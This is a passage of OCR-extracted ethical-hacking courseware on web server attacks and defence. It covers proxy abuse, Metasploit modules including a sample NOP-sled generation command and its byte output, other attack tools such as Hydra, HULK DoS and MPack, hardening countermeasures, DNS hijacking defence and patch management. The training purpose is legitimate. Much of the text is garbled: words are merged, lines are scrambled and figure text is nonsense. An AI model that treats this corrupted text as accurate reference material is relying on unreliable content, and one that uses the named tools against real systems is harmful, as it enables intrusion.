‘We
serves
ad
reverse
HTTP
pros
enabled
emoloyes
atackesto
perform
wthforwarding functions re by the

Ah
Using Serveras a Proxy
Application
Webservers are occasionally
configured
to perform
functionssuchas forwarding
or reverse
enabledare employed
HTTP proxy.Webservers withthesefunctions byattackers
to perform
the following
attacks:
=
Attacking
third-party
systemson the Internet

Connecting arbitrary the organization’s

to hosts
on internalnetwork
=
Connecting backto other services runningon theproxyhostitself
‘Attackers
use GETandCONNECT requests to use vulnerableweb servers as proxiesto connect
to andobtaininformationfromtarget systems throughtheseweb servers.

onya cv
ae
—_——_—_|=
| 6 [J}«_____—__

13.38:
Figure
ofthe
lastration
use
of asa applicationserver prony

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

e e e
Concepts
WebServer WebServer WebServer
‘Attacks tack

Patch
Management
WebServer
Security
‘Tools

Web ServerAttack Tools

In the preceding
section,w e discussed used byattackersto hacka web
the methodology
server. Thissection will introduceweb server hacking
tools that attackersmay use in the
methodology
described
i n the preceding
section.Thesetoolsextract critical during
information
the hacking
process.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Metasploit
(© T h eMetasplot
webservers, by abusing
known
platform
Frameworkisanexploitdevelopment thatsupports
vulneabltesandleveraging of
fly automatedexploitation
weak passwords
W a Tenet,SH, HTT, andSNM

Metasploit
Architecture

Metasploit
Source:https://www.metasploit.com
Metasploit
‘The toolkit,exploit
Frameworkis a penetration-testing development platform,
and
researchtool that includeshundredsof working remote exploitsfor various platforms.
It
performs of web servers byabusing
fullyautomatedexploitation knownvulnerabilitiesand
leveragingweakpasswords via Telnet,
SSH,HTTP,andSNM.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Dmretasploit

13.39:Screenshotof Metasploit
Figure

may
Anattacker
the
following performwebattack:
use features
of Metasploit
to a server
=

Closed-loop
vulnerability
validation
+

Phishing
Social
simulations
engineering
=

=
brute
Manual forcing
Manual
exploitation
=

Evade-leading
Metasploit
defensivesolutions
enablespen testersto perform
the following:
=
Quickly
complete
pen-test byautomating
assignments tasksand leveraging
repetitive
multi-levelattacks
‘Assess of web applications,
the security networkandendpoint as well as email
systems,
users
Tunnelanytrafficthroughcompromisedtargetsto pivotdeepinto a network
Customizethe content andtemplate
of executive,audit,andtechnicalreports

ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
Architecture
The Metasploit Frameworkis an open-source exploitation frameworkthat provides security
researchers and pen testers with a uniformmodelfor the rapiddevelopment of exploits,
payloads, encoders, (NOP)
no operation generators, and reconnaissancetools.Theframework
reuses large chunksof codethat a user wouldotherwisehave to copyor re-implement on a
per-exploit basis.Theframeworkis modularin architectureandencourages the reuse of code
across various projects. Theframeworkcan be brokendown into a few different pieces, the
lowestlevel of whichis the frameworkcore, The frameworkcore is responsible for
implementing all the required
interfacesthat allowinteraction with exploit
modules, sessions,
andplugins. It supports research,
vulnerability exploitdevelopment, andthecreation of custom
security
tools.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Metasploit Module
Exploit CEH
Made,
Sok withthe ae mn to
‘Metasploit
usingthe
Steps exploit system
Framework
lp of whic
‘wthhe
Dlatorms users
wth sige explo
ean targetmany
] on
Active
Contre Blt

eri theEpo Options

aso
perform
bre and attempt
attacks,
force

Metasploit
Payload
and Auxiliary
Modules

Module3 1667
Page ical andCountermensores
Mackin
©
by E-Comel
Copyright
 NOPSModule
Metasploit

to
‘Command
generate
aNOP
sled
ofa
given
lengthto NOP ‘Command
generate a50-bylesled

as ence
Modules
Metasploit
‘MetasploitExploitModule
It is a basicmodulei n Metasploit a single
usedto encapsulate exploit,
usingwhichusers
targetmanyplatforms. Thismodulehassimplifiedmeta-informationfields.Usingthe
Mixins feature, users can alsodynamicallymodify
exploit
behavior,
perform brute-force
attacks, andattemptpassive exploits,
A system can beexploitedwith the Metasploit
Framework through
the followingsteps:
©
Configure
Verify
an active
the exploit
exploit
options
Selecta target
Selecta payload
Launchthe exploit
‘Metasploit
Payload Module
exploit
‘An carries a payload
i n its backpackwhenit breaksinto a system
andthenleaves
the backpackthere.Thefollowing threetypesof payload modulesare provided
bythe
Metasploit
Framework,
gles: andcompletely
Self-contained standalone
©

©.
Stagers:
Setsup
Stages:
anetwork
connection
the
between attacker andvictim
bystagermodules
Downloaded

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Metasploit
‘A payloadmodulecan upload and downloadfilesfromthe system, take
screenshots,
andcollectpasswordhashes. It can even take over the screen, mouse, and
keyboardto controla computerremotely. The payload Module establishes a
communication channel between the Metasploit frameworkand victim host. It
combines codethat is executedas the resultof an exploit
arbitrary succeeding, To
generatepayloads,a payload is first selectedusing the commandshown i n the
screenshot

Figure13.41:Sereenshot
displaying
t he Metasploit command
payload
‘MetasploitModule
Auxiliary
modules
Auxiliary of Metasploit can be usedto perform one-offactions such
arbitrary,
as portscanning, DoS,and even fuzzing. It includestoolsandmodulesthat assess the
securityofthetargeta s well as auxiliary
modules suchas scanners,DoSmodules, and
fuzzers.The show auxiliary commandin Metasploit can be used to list all the

available
auxiliary
inMetasploit.
usedto exploit
modules
are auxiliary
exploitation.
All modules
modules.Metasploit
for various purposesother than
uses auxiliary
Auxiliary
other thanthe ones
i n Metasploit
modulesas an extension
modulesare stored i n the
modules/auxiliary/directory main directory.
of the framework’s The run commandor
the exploit command c an be usedto run an auxiliarymodule.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 13:42;
Figure Screenshot suxiarymodule
displaying commands
of Metasploit

require
of an auxiliary
Thebasicdefinition
'msf/core! isas
module follows:

p "MyAuxiliary Module―
class Metasploit3 < Msf: :Auxiliary
end # for the class definition
‘Metasploit
NOPSModule
NOP modulesgenerateno-operationinstructions usedfor blocking out buffers.The
generate commandc an beusedto generate
format.
i n a given aNOPsled of arbitrary
size anddisplayit

Options:
-b<opt>: to avoid("\x00\xft")
A listofcharacters
-h:Helpbanner
A comma separated
-s <opt>: listof registers
to save
-t<opt>:Theoutputtype(Ruby, Perl, or raw)
msf
nop(opty2)>
Thefollowing a NOPsledof a given length
commandis usedto generate
msf > use x86/opty2
ms£nop(opty2)> generate -h
Usage: generate [options] length
Thefollowing a 50-byte
commandis usedto generate NOPsled:
msf nop(opty2) > generate -t c 50
unsignedchar buf[] =

""\x5 \x3d\x05 \x15\x£8\x67\xba\x7d\x08\xd6\x66\x9f\xb8\x2d\xb6"

""\x24
\xb1
\xbe \x3f\x43\x1d\x93\
xb2\x37\x35\x84\xd
\x40\xb« x14
"

\xb3
xd
\x41 \xb9\x48\x04\x99\x46\x29\xb0\xb7\x2f\xfd\x96\xda\x98"
"\x92\xb5\ \x4f\x91";
ms£nop(opty2)>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerAttackTools
Immunity's
CANVAS

web
atack
tectnoley
‘Web
ServerAttackTools
THCHye (tps //othub.com)
HULK
o s hete//thub com)
MPeck
tos/sourceforge.net
wa ht/fadaor)

WebServerAttack Tools
Immunity’s
CANVAS
Source:https://www.immunityinc.com
Immunity’s
provides
CANVAS penetration professionals
testers andsecurity with hundreds
of
exploits,
an automatedexploitation
system,anda comprehensive,
reliableexploit
development
framework.It provides
featuressuchas client-sideexploitation,
privilege
escalation,
HTTP
tunneledprivilege
escalation,
remote kernelexploitation,
advancedbackdoortechnology,
and
advancedwebattacktechnology.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
are some additional
webserver attacktools:
=
THCHydra(hetps://github.com)
=
HULKDoS(https://github.com)
=
MPack(hetps://sourceforge.net)
wat (http://w3af.org)

tical
Making
and by CountermensoresCopyright©
Comet
 ModuleFlow

Concepts
WebServer WebServer WebServer WebServer
‘Attacks ttack ‘tack

e °e
Counter:
Patch
e
measures
WebServer

Management Security
‘Toole

Countermeasures
In previoussections, the benefits
we discussed of a well-informed
web server security
posture,
the danger
posed
byweb
server
attacks, the methodology
toolsthat assistan attackeri n performing
toolsand techniques
usedi n web
server
usedi n securing web servers. Thissection discusses
attacks,
andthe
webserver attacks.In this section,w e discuss
the
various methodsto
detectwebserver attacks,
countermeasures, anddefense techniques.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PlaceWebServersin Separate
SecureServerSecurity
Segmenton Network

hosting
network
|GAndes! web
a should
securebe
server
scutity wit
atone
called (DMZ),
segment fen
designed
odie
east thresegments an
namely, nternet

ad en nero network
segment,

“a
Thee
Server
server

Segment
shouldbeplaced
pul andintrnalnetworks
i n the Secu [OMZ) ofthe elated am the
network,

PlaceWebServersin Separate SecureServerSecurity Segment

im
on Network
idealweb hosting
‘An networkshouldbe designed with threesegments: Internet segment;
an a
secure server securitysegment, whichis oftencalledthe demilitarizedzone (DMZ); andan
internalnetwork.Thefirst stepin securingwebservers is to place
themseparatelyi n the DMZ,
whichis isolatedfrom the publicnetworkandfromthe internalweb-hosting network.Placing
web servers in a separate segment addssecuritybarriersbetweenthe web servers and the
internalnetwork as well as betweenthe web servers and the outsidepublic network.This
separation allowsthe administratorto placefirewallsand applyaccess control basedon
securityrulesfor the internalnetwork as well as for Internet traffic towardthe DMZ. Sucha
web-hosting networkcan preventattackson the web server byoutsideattackersor malicious
insiders.
Network segmentationdividesa networkinto differentsegments, eachhaving its own hub or
switch.It allowsnetworkadministratorsto protecto ne segment from othersbyenforcing
firewallsandsecurityrulesdepending desired.In a segmented
on the levelof security network,
an attackerwhocompromises one segment of the networkwill not beableto compromise the
security of other segmentsof the network.Let us example a sample web-hosting networkthat
is segmented bytheadministratori n sucha manner web
that
theserveris placedin a DMZ,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures:
Patchesand Updates

OD
nce eres
paints ose

cn aDanan

non-production
repretentatve environment ‘operations
maintenance and tr to never have

Countermeasures: Patches and Updates

Thefollowing andpatch
are various countermeasuresforsecure update of web
management

Scanforexisting
‘=
patch
vulnerabilities; andupdate regularly.
the server software
Before applying any service pack,
hotfix, patch,
or security readandpeer review all
relevantdocumentation.
Applyall updates, regardless
of their type, on an “as-needed―
basis.
Testservice packs andhotfixeso n a representative non-production environment prior
to deployment i n production.

hotfixes,
Ensurethat service packs, andsecurity patchlevelsare consistenton all
domaincontrollers(DCs).
Ensurethat server outagesare scheduled andthata complete set ofbackup tapesand
emergencyrepair disksare available.
Keep a back-out planthat allowsthesystemandenterprise to return to theiroriginal
state,prior to a failedimplementation.
periodic
‘Schedule service-pack upgradesas partofoperations maintenance andnever
trail bymore thantwo service packs.
Disable all unusedscriptextension mappings.
usingdefaultconfigurations
‘Avoid that web servers are dispatched with.
Usevirtualpatches i n the organization
because theyprovide additional
identification/logging
capabilities.
a disasterrecoveryplan
Establish to handlepatch failures.
management
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures:
Protocolsand Accounts

Protoca(cr wat andunncesay

prtes ch

propriate leatposible)
to
the permisions
NTFS

habe
WebOY
te not dy apatin or
pesthen sos
exourd ane parm

Countermeasures:ProtocolsandAccounts
Countermeasures:
Protocols
following
‘The are various protocols
countermeasures for usingsecure
on web servers.

Block all unnecessary ports,Internet ControlMessage Protocol(ICMP) traffic,and

unnecessary suchas NetworkBasicInput/Output
protocols System (NetBIOS) andSMB.
Hardenthe TCP/IP
stackandconsistently apply
the latestsoftwarepatches updates
and
to software.
system
If protocols
insecure such as Telnet, POP3,SMTP, and FTPare used,then take
appropriatemeasures to provide secure authenticationand communication,for
example, byusingIPSecurity(IPSec)policies.
If remote accessis needed,ensure that remote connections are securedproperly
by
usingtunneling
andencryption protocols.
DisableWeb Distributed Authoring (WebDAV)
and Versioning if it is not usedbythe
application,
or keep i t secure if itis required.
Usesecure protocols
suchas Transport
Layer (TLS)/SSL
Security for communicating
with
the webserver.
Ensurethat unidentifiedFTPservers operatei n an innocuous partof the directory
tree
that is different
fromthewebserver's tree.
Countermeasures:
Accounts
Thefollowing
countermeasurescan beadopted
to secure user accountson @web server:
=
all unusedmodulesandapplication
Remove extensions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Disable
unuseddefaultu ser accountscreatedduringthe installation
ofan OS.
a new web root directory,
Whencreating grantthe appropriate (leastpossible)NTFile
System(NTFS)
permissionsto anonymous users of the IISweb server to access the web
content.
Eliminateunnecessarydatabaseusers andstoredprocedures
andfollowthe principle
of
leastprivilege
forthedatabaseapplicationto defend SALquerypoisoning.
against
Usesecure web permissions,
NTFSpermissions,
and .NETFrameworka ccess control
mechanisms
URL
including authorization
Slow down brute-force
and dictionary policies,
attackswith strongpassword and
implement
and failures.
audits alertsfor login
Runprocessesusing leastprivileged
accountsas well as leastprivileged
service and user
accounts
Limit the administratoror root-level access to the minimum numberof users and
a ofsame.
maintain record the

of
Maintain logsall

on in
an
encrypted
user
machine theintranet.
activity formon thewebserver
orin a separate

Disableall non-interactive accountsthat shouldexist but do not require an interactive

login

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Countermeasures:
Files and Directories

sensitive
configuration
Eliminate
withinthebytecoee infomation

‘ns
recor
||
msg wean no seeing
crane psy cere

SOL
Merosot Serer MySOX e weite
fies
ond
‘dv the on system
septs aseparatepartion
than hat oftheoperating

Countermeasures:Files andDirectories
Thefollowing
countermeasurescan beadopted
for securingfilesanddirectorieso n a web
server.
Eliminate
=
unnecessary
filesjar
within files.
Eliminatesensitive configuration
informationwithinthe bytecode.
=
Avoid mapping virtualdirectoriesbetweentwo differentservers or over a network.
Monitor andcheckall networkservices logs,
websiteaccess logs,
databaseserver logs
(e.g,MicrosoftSQLServer,MySQL, andOracle), andOSlogs frequently.
of
Disablethe serving directory
listings.
Eliminatenon-webfilessuchas archivefiles,backup
files,text files,and header/include
files.

of
Disablethe serving certain file typesbycreating
Ensurethat web applications
a resource map.
or websitefiles and scriptsa re stored i n a partition
or
driveseparatefromthatoftheOS,logs, andanyother system files.
Runtheweb server within a sandboxdirectory forpreventing accessto system files.
Avoidall non-webfile typesfrombeing
referencedi n a URL

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerHacking
Detecting Attempts
|G Usea Websitechange to detect
DetectionSystem hacking
attemptsonthe
web
sever
peti
fanning
xipt
on
the server tht detects
ay made
chinges eet
nthe existing l eo new e eed

WebServerHacking
Detecting Attempts
‘An
attackerwho gains access to a web server by compromising security
through
known
vulnerabilities
presenti n the web server may attemptto plantbackdoors(scripts).
These
backdoors allowthe attackerto gainaccess, launchphishing
attacks,or sendspamemails.The
victim remains unaware of thewebserver attackuntiltheserver is blacklisted o n spam mails
or
Untilthe attackerredirectsthe visitors of a targetsite hostedon theweb server to some other
site, Thus, a web server attackis difficult to detectunless
suchmaliciousevents occur. Bythe
time theseevents occur, it maybe too late to react because the attackerwouldhave already
succeeded. Therefore, a mechanism to detecta webserver hacking attempti n its early
stagesis
required to prevent harmto the webserver.
Whenan attackerinstallsa backdooron a web server, the size of files infectedwith the
backdoorautomatically increases. A website change detection system(WDS) is a scriptthat
runs on the server to detectchanges madeto any executablefile or the presenceof any new
file o n the web server, suchas HTML, JavaScript(JS),PHP, Active Server Pages(ASP), Perl,and
Python files.It worksbyperiodically comparingthe hashvaluesof the fileson the server with
their respective master hashvaluesto detectany changes to the codebase. If it detectsany
change on the server, it alertsthe user to take necessary action. Thus,W S helps i n detecting
‘webserver hacking attemptsi n the earlystages of an attack.For example, Directory Monitor is
an automatedtool that goesthrough entire webfolders, detectsany changes madeto the
codebase,
and
alerts the user through an email

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defend
Against
Web
ServerAttacks

©
reply
ua on
te ports
data
range
ate
valid
ang
ensure hat © rare thatceria thatthe

Lin inbound
forrest) 80
wae to port forHTTP
and port ertieat'
‘ootathe
publ key vail he way 3 uted

|
How to Defend Against
Web Server Attacks (Cont'd) CEH
sr

that sear reatedating ar andacest

congueapropriatey the metaboeect wth

Module3 1681
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 How to Defend
Against
WebServerAttacks(Cont'd)

How to DefendAgainst WebServerAttacks

Defenses web
against server attacksincludethe following,
Ports
Monitor all portso n thewebserver regularly to preventunnecessary traffictowardthe
targetwebserver. If trafficis not monitored,the targetweb server will bevulnerableto
malwareattacks.Do not allow public access to port 80 for HTTP or to port443 for
HTTPS;trafficto theseportsshouldbe limited.If port80 is keptopen,the server will be
vulnerableto DoS attacks, which consume server resources. Intranet traffic should
eitherbeencryptedor restrictedto secure theweb server.
Attackersattemptto hidetheir identitybyspoofing the IPaddressof a legitimate user.
Byprocessingthe securitylogfile,eitherusingthe “deny this IP address―
rulei n the
firewallrulesetfile or bycreating
a “routed
blackhole―
command, the targetsystem can
defendagainst web server attacks.
ServerCertificates
Servercertificates
guaranteesecurityand are signed bya trustedauthority. However,
a n attackermay compromise certified servers usingforged certificatesto intercept
secure communications byperforming MITM attacks. Thereare various techniquesto

avoidattacks.
are
some
suchMITM
ofthem. Thefollowing
©. Usethe directvalidationof certificates.
© Usea novelprotocol on thirdparties
that doesnot depend forcertificate
validation,
Allowdomainsto directly examine their certificates
and securely byusingpreviously
established
user authentication
credentials.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Usea robustcryptographic construction thatenhances validation
server identity and
resolves
of
the limitations third-party solutions.
Ensure that the certificatedata rangesare valid andthat certificatesare usedfor
theirintendedpurpose.
public
Ensurethat the certificatehasnot beenrevokedandthat the certificate’s key
is validallthe wayto a trustedroot authority,

Machine.config
The machine.configfile provides a mechanism of securinginformationbychanging
machine-level
settings. It affectsall other applications,
Themachine.configfile includes
for the .Netframework,
machinesettings Thefollowing
whichaffectthe security. can be
with the machine.config
performed file:
© Ensurethat protectedresources are mapped
to HttpForbiddenHandler
and that
unusedHttpModulesare removed

Ensure that tracing and debug

is disabled<trace enable="false"/> compiles
are
turnedoff
© Verifythat ASP.NET errors are not revertedto theclient
© Verify
session state settings

CodeAccessSecur
Thefollowing
measurescan be adopted
to ensure codeaccesssecurity
© Implement
secure coding to avoid source-code
practices disclosureand input
validationattacks.
© policy
Restrictcodeaccesssecurity settings
to ensure thatthereare no permissions
to execute codedownloadedfromthe Internetor intranet.
Configure
IIS to rejectURLswith "../" to preventpathtraversal, lockdownsystem
and utilitieswith restrictive accesscontrollists(ACLs),
‘commands and installn ew

©
patchesandupdates.
implement
If targets
do not codeaccess securityi n theirweb servers, thenthere is a
possibility
of execution ofmaliciouscode,
following
‘The are some othermeasuresto defendagainst
web server attacks.
=
Apply
restrictedACLsandblockremote registry
administration,
Secure the SAM(stand-alone
servers only)
‘=
Ensurethatsecurity-related a re configured
settings andthat accessto the
appropriately
metabasefile is restrictedwith hardenedNTFSpermissions.
Remove unnecessaryInternet Server Application Interface(ISAPI)
Programming filters
web
fromthe server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 filesharesincluding
Removeall unnecessary if they
thedefaultadministrationshares,
are not required.
Securethe shares
with restrictedNTFSpermissions,
Relocatesites and virtual directories partitions and use IIS web
to non-system
permissionsto restrict access.
Remove all unnecessary 11Sscriptmappingsfor optional file extensions to avoid
ofanybugs
exploitation i n the ISAPI
extensionsthat handlethesetypesoffiles
Enablea minimum levelof auditing on the web server and use NTFSpermissions to

log
protectfiles
Usea dedicated
machineas a webserver.
to internalservers cautiously
CreateURLmappings
Donot installthe IISserver on a domaincontroller.
Use server-sidesession ID tracking
and match connections with timestamps,
IP
addresses,
ete,
If a databaseserver,suchas MicrosoftSQL
Server,
is to beusedas a backenddatabase,
installit on a separate
server.

tools provided
Usesecurity with webserver software
andscannersthat automate and
the aweb
simplify processof securing server.
Physically
the
protect webserver machinei n a secure machineroom
Donot connect an IlsServerto theInternetuntilitis fullyhardened.
Donot allowanyoneto locally
login to themachineexcepttheadministrator.
Configure anonymoususer account for eachapplication,
a separate if multiple
web
applicationsare hosted.

Limitthe server functionality onlythe webtechnologies

to support to beused.
Screenandfilter incomingtrafficrequests.
Storewebsitefilesandscripts partitionor drive.
o n a separate

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defend against
HTTPResponse-Splitting
andWeb
CachePoisoning

© Regular updat/pate
the
OS and
wed server

ProxyServers

se aferet TCP
connactonswith theron for ferent vital hosts

How to Defendagainst HTTP Response-Splitting andWebCachePoisoning

Whilesettingcookies, remove carriage returns (CRs) and linefeeds(LFs)before insertingdata
into an HTTP response header.
Thebestpractice i s to use third-party
products to test forthe
existence of securityholesand defendagainstCRLFinjection. Ensurethat data application
engines are up to date.
The User Datagram Protocol(UDP) source port randomizationtechnique defendsservers
againstblind response forgery. Limit the numberof simultaneousrecursive queries and
increasethe times-to-live(TTLs)
oflegitimate records.
The following are some methodsto defendagainst HTTPresponse-splitting attacksandweb
cachepoisoning:
=

Server
©.
Admin
Usethelatestwebserver software
©

update/patch
Regularly theOSandweb server
Runa web vulnerability
scanner

Restrictthewebapplication's
accessto uniqueIPs
Disallow
Comply with RFC
or
\r} for
CR(360d andLF(960a
or \n)characters
2616specifications HTTP/1.1
Parseall user inputsor otherformsof encoding
beforeusing themi n HTTPheaders

ical andCountermensores
Mackin ©by E-Comel
Copyright
Proxy Servers
Avoid sharing
different
incomingTCPconnectionsamor clients
©

9
UsedifferentTCP
Implement
“maintain
with
thefor
connections proxy different virtualhosts
correctly
requesthostheader―

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Defendagainst
DNSHijacking

EWcrocee ican accretederrand encourage

an

EBssesvars eptrant
the account information
the
onthedomain
Reptrat-Lack ose name

EB ence ons
ijcting dent responded
it contin planing
busines

TEI onsonoringtoisenicestomontorONS IPadressandalert

Use server

HED
stan ants prog andtet reguay

KEcrore nectar porta ames wth thetr seins

How to Defendagainst
DNSHijacking
Thefollowing
techniquesbeusedto defendagainstONShijacking
can

accreditedbythe Internet Corporation

Choosea registrar for Assigned
Names and
Numbers(ICANN)
andencourage on the domain
themto set REGISTRAR-LOCK name,

Safeguardthe registrant'saccount information,

IncludeDNShijackingi n incidentresponseandbusiness continuityplanning.
UseDNSmonitoring tools/services to monitor the IP address
of the DNSserver andset

up alerts,
downloading
‘Avoid audio and video codecsand other downloadersfrom untrusted
websites

Change
an
Install antivirus programandupdate
the defaultrouter password
it regularly.

Restrictzone transfersanduse scriptblockersi n the browser.

DomainName System Security (DNSSEC):
Extensions It addsan extra layerto DNSthat
i t frombeing
prevents hacked.
Strong Policiesand UserManagement:
Password
enhancessecurity.
Theuse strongpasswords
further
of
(SLAs)
BetterServiceLevelAgreements fromDNSServiceProviders:
Whensigningup
for DNSservers with DNSservice providers,
learnwho to contact whenan issue accurs,
howto receive good-quality and support,andwhether the DNSserver's
reception
infrastructureis hardened
againstattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Configuring
a Master-Slave
DNSwithinyour Network:Usea master-slave
ONSand
configure
the master without Internet access. Maintaintwo slaveservers so that even if
an attacker
hacksa slave, it will update onlywhenit receives an update fromthe
master.
Constant Monitoring
of DNSServers: Theconstant monitoring
of DNSservers ensures

a
that domainname returns the
EnsureRouterSafety:Change
correct
IPaddress.
the default username and passwordof the router. Keep
up to datefor ensuringsafety
thefirmware fromnew vulnerabilities.
UseVPNService:Establish virtual privatenetwork (VPN)-encryptedtunnelsforsecure
privatecommunication over the Internet. This feature protectsmessages from
and
‘eavesdroppingunauthorizedaccess.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

WebServer WebServer WebServer

Concepts ‘Attacks ‘Rttack

Patch WebServer

Management Security
‘Tools

Patch Management
Developers
always
i n the formof patches, to
attempt findbugs
i n a web server andfixthem.Bug
whichprovide protection against
fixesare distributed
knownvulnerabilities.Unpatched or
vulnerablepatches
role of patches,
guidance
upgrades,
for choosing
loophole
can create a security i n thewebserver.
This
section describes
the
and hotfixesi n securing web servers. Thissection also provides
proper patches,upgrades, andtheir appropriate
hotfixes, sources for
secure patch
management.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Patchesand Hotfixes

theperformance
af
computerprogram
rts
supporting data

benotifiedtroughemails
Users may or thevendor's
through website

problem
_patehcanbeconsideredas a repaijb for«programming

Motfngs
ae sometimes
package
2s
a
set offb called a combined
hotfixor servicepack

PatchesandHotfixes
A patch is a smallpiece of softwaredesigned to fix problems, security vulnerabilities,
and bugs
aswellas improvethe usability or performance of a computer programor its supporting data.A
patchc an beconsidered a repairjobfor a programming problem. A softwarevulnerability is the
weakness of a softwareprogramthat makesit susceptible to malwareattacks. Software
vendorsprovide patchesthat preventexploitations and reducethe probability of threats
exploiting a specific vulnerability.
Patchesincludefixesandupdates for multiple knownbugs or
issues.A patch i s a publicly
releasedupdate that is availablefor all customers.A system without
patches is muchmore vulnerableto attacksthan a regularly patched system.If an attackercan
identifya vulnerability before it is fixed,then the systemmightbe susceptible to malware
attacks.
Ahhotfixis a package
usedto address
a criticaldefecti na live environmentandcontains a fix for
asingle
i ssue.It
a product
version.
updatesspecific
that the issues are resolved.Apply quick Hotfixesprovide solutionsandensure
hotfixesto softwarepatches on production
systems.
Vendorsupdate users aboutthe latesthotfixes throughemailor makethem available o n their
officialwebsite.Hotfixesare updates that fix a specificcustomer issue and are not always
distributed
outsidethecustomer organization. occasionally
Vendors deliverhotfixesas a set of
fixescalleda combinedhotfixor service pack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is PatchManagement?
| “Patch

onaprocess
management
ateinsaled
ea
system
used byensuring
t o ixknownvulnerabilities thattheappropiate
patches

An automatedpatch
management
process
Detect
| @ Usetoolstodetectmisingsecrtyptches

| Asses
‘Raseas@
the
sels
asosated
severities
thethat
may
the
and factors
bymitigating een declan

Require
| thepatch
| Dowroud foresing

‘Test
| machine of
the
Intal thepach
fat on testing to vey theconsequent update

Deploy |

te and tha
the
©Deploy atcto he computersensre aplatoneae notacted

What is Patch Management?

According
to http://searchenterprisedesktop.techtarget.com,
is an area of
patchmanagement
systems management that involvesacquiring,testing,and installing
multiple patches(code
changes) i n a n administeredcomputer system.Patchmanagement is a methodof defense
againstvulnerabilitiesthat cause securityweaknesses or corruptdata. It is a processof
scanningfor networkvulnerabilities,detectingmissedsecurity patches andhotfixes,and then
deploying
the relevantpatches
as soon as they
are availableto secure the network.It involves

the=
tasks:
following
Choosing,
verifying,
testing,andapplying
patches
*
Updating
previously
applied
patches
with current patches
Listing patches
applied
previously
to the current software
Recording repositories
or
Assigninganddeploying
depots
easyselection
of patches
the applied
for
patches,
automated
‘An
+
patch the
following
management processincludes
patches.
Detect:Usetoolsto detectmissingsecurity
steps.

=
Assess: issue(s)
Assesthe by
andits associated thefactorsthat may
severity mitigating
thethe
influence
‘Acquire:
decision,

patch
Download fortesting
Test:Installthe patch
Deploy:
Deploy thepatch
of
first on a test machineto verify
to computers
the consequences the update.
andensure that applications
are not affected.
Maintain: Subscribeto receive notificationsabout vulnerabilitieswhen theyare
reported.
Module3 Page1694 ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Installationof a Patch

enstying
Apps ltation
ota
tor Updater and
Pateh Patch
or
andPate
ImplementationVeriict
security Upgrade

ay
path,
(& Fest makepatchmanagement Userscancco ad ital eecunty Before
intaing veri

Bites

updates proper
patch Patches ©Usea
an dbeinsaledintwoways managment

o d oporoptate
re
Scns ey nt Mana astatation ety

tptAuto
Update
featur managemen
Issuesrelevant
to proactive te the The patch team
peter ith
be tumors

Installation of a Patch

Identifying
a
Theinstallationof patch
entailsthe following
Appropriate
Sources
tasks.
for UpdatesandPatches
Itis important to identifyappropriate sources for updates and patches. Patches and
updates that are not installedfromtrustedsources can renderthe targetserver even
more vulnerableto attacks, insteadof hardening its security. Thus, the selectionof
appropriatesources for updates andpatchesplays a vital rolein securing web servers.
The following are some methodsfor identifying appropriate sources for updates and
patches.
© Createpatch
a
objectives. plan
fits
managementthat theoperational environment business
and
updatesand patches
Findappropriate on the homesites of the applications
or OS
vendors.
methodof tracking
Therecommended patching
issues relevantto proactive is to
register to thehomesitesto receive alerts.
Installation
a
of Patch
Usersc an accessandinstallsecurity patches via theWorldWideWeb.Patches c an be
installed i n two ways.

© Manual Installation
In thismethod, the user downloadsthe patch fromthe vendorandinstallsit.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Installation
‘Automatic
In thismethod,
applications
usean auto update featureto updatethemselves,
‘=
Implementation
9 Beforeinstalling
any patch,
of
andVerification a Security
verify
the source.
Patchor Upgrade

Usea properpatchmanagement programto validatefileversions andchecksums

beforedeploying patches.
security
Thepatch management tool must beableto monitor the patched systems.
> Thepatch
management shouldcheck updates patches
team for and regularly.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PatchManagement
Tools
GFT tancursspate
stately
scat let
management yur eter Symantec Management

PatchManagement
Tools
+
GFlLanGuard
Source:https://www.gfi.com
TheGFl LanGuardpatch management softwarescans the user'snetworkautomatically
as well as installsand manages securityand non-securitypatches.It supports
machines
across Microsoft®, MAC OS X°, and Linux®operating as well as manythird
systems,
partyapplications. It allowsauto-downloads of missingpatches rollback,
as well as patch
resulting i n a consistentlyconfiguredenvironment that is protected fromthreatsand
vulnerabilities

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘The
of
Gl13.45:Screenshot LanGuard
Figure

areadditional
followingsome patchmanagement tools:
software
patchmanagement

=
Symantec (https://www.symantec.com)
ClientManagement
Suite
=
Solarwinds (https://www.solarwinds.com)
PatchManager
=
Kaseya PatchManagement(https://www.kaseya.com)
SoftwareVulnerability
Manager(https://www.flexerasoftware.com)
forEndpoint
IvantiPatch Manager (https://www.ivanti.com)

Module3 1695
Page
©
1 countermensreCopyriht y -Comell
 ModuleFlow

Concepts
WebServer WebServer WebServer
‘Attacks ‘Rttack

Patch
Management
WebServer
Security
Toole

Web Server Security

Tools
Thissection describes common web server secrity toolsthat secure a web server against
possible ities i n a targetserver andweb applications,
attacks.Thesetools scan for vulnerabilit
sendalertsi n the case of hackingattempts,scan formalwarei n theweb server, and perform
